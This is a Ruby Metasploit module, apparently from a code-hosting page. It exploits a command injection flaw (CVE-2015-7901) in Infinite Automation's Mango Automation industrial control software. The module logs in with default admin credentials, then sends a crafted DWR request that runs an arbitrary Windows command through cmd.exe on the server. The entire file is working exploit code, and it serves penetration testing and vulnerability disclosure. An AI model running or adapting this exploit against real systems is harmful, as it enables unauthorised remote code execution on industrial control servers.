114 lines
No EOL
3.1 KiB
Ruby
Executable file
114 lines
No EOL
3.1 KiB
Ruby
Executable file
require 'msf/core'
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
Rank = GreatRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Infinite Automation Mango Automation Command Injection',
|
|
'Description' => %q{
|
|
This module exploits a command injection vulnerability found in Infinite
|
|
Automation Systems Mango Automation v2.5.0 - 2.6.0 beta (builds prior to
|
|
430).
|
|
},
|
|
'Author' => [ 'james fitts' ],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2015-7901' ],
|
|
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-300-02' ]
|
|
],
|
|
'DisclosureDate' => 'Oct 28 2015'))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(8080),
|
|
OptString.new('TARGETURI', [ false, 'Base path to Mango Automation', '/login.htm']),
|
|
OptString.new('CMD', [ false, 'The OS command to execute', 'calc.exe']),
|
|
OptString.new('USER', [true, 'The username to login with', 'admin']),
|
|
OptString.new('PASS', [true, 'The password to login with', 'admin']),
|
|
], self.class )
|
|
end
|
|
|
|
def do_login(user, pass)
|
|
uri = normalize_uri(target_uri.path)
|
|
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => uri
|
|
})
|
|
|
|
if res.nil?
|
|
vprint_error("#{peer} - Connection timed out")
|
|
return :abort
|
|
end
|
|
|
|
cookie = res.headers['Set-Cookie']
|
|
|
|
print_status("Attempting to login with credentials '#{user}:#{pass}'")
|
|
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => uri,
|
|
'cookie' => cookie,
|
|
'vars_post' => {
|
|
'username' => user,
|
|
'password' => pass,
|
|
}
|
|
})
|
|
|
|
if res.nil?
|
|
vprint_error("#{peer} - Connection timed out")
|
|
return :abort
|
|
end
|
|
|
|
location = res.headers['Location']
|
|
if res and res.headers and (location = res.headers['Location']) and location =~ /data_point_details.shtm/
|
|
print_good("#{peer} - Successful login: '#{user}:#{pass}'")
|
|
else
|
|
vprint_error("#{peer} - Bad login: '#{user}:#{pass}'")
|
|
return
|
|
end
|
|
|
|
return cookie
|
|
|
|
end
|
|
|
|
def run
|
|
cookie = do_login(datastore['USER'], datastore['PASS'])
|
|
|
|
data = "callCount=1&"
|
|
data << "page=%2Fevent_handlers.shtm&"
|
|
data << "httpSessionId=%0D%0A&"
|
|
data << "scriptSessionId=26D579040C1C11D2E21D1E5F321094E5866&"
|
|
data << "c0-scriptName=EventHandlersDwr&"
|
|
data << "c0-methodName=testProcessCommand&"
|
|
data << "c0-id=0&"
|
|
data << "c0-param0=string:c:\\windows\\system32\\cmd.exe /c #{datastore['CMD']}&"
|
|
data << "c0-param1=string:15&"
|
|
data << "batchId=24"
|
|
|
|
res = send_request_raw({
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri("dwr", "call", "plaincall", "EventHandlersDwr.testProcessCommand.dwr"),
|
|
'cookie' => cookie.split(";")[0],
|
|
'ctype' => "application/x-www-form-urlencoded",
|
|
'headers' => {
|
|
'Origin' => 'null',
|
|
'Upgrade-Insecure-Requests' => 1,
|
|
'Connection' => "keep-alive"
|
|
},
|
|
'data' => data,
|
|
}, 5)
|
|
|
|
if res.body =~ /org.directwebremoting.extend.MarshallException/
|
|
print_error("Something went wrong...")
|
|
puts res.body
|
|
elsif res.body =~ /Check your Tomcat console for process output/
|
|
print_good("Command executed successfully")
|
|
end
|
|
|
|
end
|
|
end |